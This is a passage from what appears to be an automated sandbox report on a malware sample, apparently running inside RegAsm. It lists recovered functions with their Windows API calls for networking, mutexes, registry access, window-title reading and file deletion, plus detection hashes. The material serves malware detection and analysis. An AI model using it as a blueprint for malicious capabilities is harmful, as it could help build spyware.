                                Download Yara Rule
                                APIs
                                • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEventStartupsocket
                                • String ID: (I)
                                • API String ID: 1953588214-2853610090
                                • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                Function 00414EE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON
                                Download Yara Rule
                                APIs
                                • getaddrinfo.WS2_32(00000000,00000000,00000000,(I),004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                  • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                  • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                  • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                  • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                  • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                • String ID: (I)
                                • API String ID: 1170566393-2853610090
                                • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                • GetLastError.KERNEL32 ref: 0040D083
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateErrorLastMutex
                                • String ID: SG
                                • API String ID: 1925916568-3189917014
                                • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                • RegQueryValueExA.KERNEL32 ref: 004135E7
                                • RegCloseKey.KERNEL32(?), ref: 004135F2
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                • RegQueryValueExA.KERNEL32 ref: 0041372D
                                • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                • RegQueryValueExA.KERNEL32 ref: 00413587
                                • RegCloseKey.KERNEL32(?), ref: 00413592
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
                                • RegQueryValueExA.KERNEL32 ref: 0041352A
                                • RegCloseKey.KERNEL32(?), ref: 00413535
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                • RegCloseKey.ADVAPI32(004660A4), ref: 004138AB
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID:
                                • API String ID: 1818849710-0
                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                Function 0044EDC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Info
                                • String ID:
                                • API String ID: 1807457897-3916222277
                                • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                                • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
                                Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen
                                • String ID: pQG
                                • API String ID: 176396367-3769108836
                                • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                Function 00448BB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: String
                                • String ID: LCMapStringEx
                                • API String ID: 2568140703-3893581201
                                • Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                • Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                Function 00448A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                                Strings
                                • InitializeCriticalSectionEx, xrefs: 00448A9F
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountCriticalInitializeSectionSpin
                                • String ID: InitializeCriticalSectionEx
                                • API String ID: 2593887523-3084827643
                                • Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
                                • Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
                                Function 00448710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Alloc
                                • String ID: FlsAlloc
                                • API String ID: 2773662609-671089009
                                • Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                                • Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
                                Function 00438D94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                • try_get_function.LIBVCRUNTIME ref: 00438DA9
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: try_get_function
                                • String ID: FlsAlloc
                                • API String ID: 2742660187-671089009
                                • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                                • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
                                Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                Download Yara Rule
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID: @
                                • API String ID: 1890195054-2766056989
                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                Function 0044F119 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                                • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CodeInfoPageValid
                                • String ID:
                                • API String ID: 546120528-0
                                • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                                • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
                                Function 0044EF58 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                  • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                  • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • _free.LIBCMT ref: 0044EFD0
                                • _free.LIBCMT ref: 0044F006
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast_abort
                                • String ID:
                                • API String ID: 2991157371-0
                                • Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                                • Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                                Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc__crt_fast_encode_pointer
                                • String ID:
                                • API String ID: 2279764990-0
                                • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$ForegroundText
                                • String ID:
                                • API String ID: 29597999-0
                                • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                Function 0043A3EC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                • String ID:
                                • API String ID: 806969131-0
                                • Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                • Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
                                • Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                • Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F
                                Function 0043AA1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm
                                • String ID:
                                • API String ID: 65215352-0
                                • Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                • Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
                                • Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                • Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A
                                Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Startup
                                • String ID:
                                • API String ID: 724789610-0
                                • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                Function 00426CC8 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: send
                                • String ID:
                                • API String ID: 2809346765-0
                                • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                                • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                                Function 00426CB1 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: recv
                                • String ID:
                                • API String ID: 1507349165-0
                                • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                                • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725

                                Non-executed Functions

                                Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                  • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                  • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                  • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
